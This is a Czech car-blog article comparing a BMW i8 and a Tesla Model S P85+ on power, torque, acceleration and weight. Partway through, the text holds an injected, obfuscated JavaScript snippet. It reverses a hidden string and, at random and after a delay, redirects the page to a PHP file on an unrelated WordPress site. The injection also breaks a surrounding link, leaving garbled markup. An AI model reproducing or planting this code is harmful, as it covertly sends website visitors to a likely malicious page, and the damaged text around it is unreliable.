Vzít v pátek 13. auta za osm mega a jet s nima blbnout na letiště je docela zajímavej nápad. Nebo možná ani ne tak zajímavej, jako spíš odvážnej. Nebo abysme byli úplně upřímný, je docela blbej. Na pověry samozřejmě nevěřim, jenže problém s pověrama, stejně jako třeba s vírou v Boha, je ten, že i když na ně absolutně nevěříte, stejně za to od nich čekáte nějakou zlomyslnou pomstu. Majitelé obou aut, BMW i8 a Tesly Model S P85+, naštěstí asi nemaj kalendář.
$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}todlak.cz/teslak-model-s/“ target=“_blank“ rel=“noopener noreferrer“>před časem samostatně, bezprostřední srovnání dvou ikon automobilovýho pokroku mě ale hrozně zajímalo. Stejně jako to, jestli setkání s Teslou bude i napodruhý tak silnej zážitek, nebo jestli s momentem překvapení zmizí i část celýho kouzla. Minimálně pokud jde o výkon, jsou si navíc obě auta hodně blízko. Tesla má 416 koní, 600 Nm a je na stovce za 4,3 sekundy, BMW i8 má celkem 362 koní a 570 Nm a stovku za 4,4 sekundy. Ovšem elektrická amerika to všechno zvládá i s hmotností přes dvě tuny, zatímco německej hybrid je o víc než půl tuny lehčí.
Protože většina automobilek, dealerů a agentur ještě nedokázala plně docenit výjimečnost Autodlaka, za půjčení obou aut mockrát díky super klukům z Liftago Taxi a Nano Energies. Foto Zdeněk Šmída.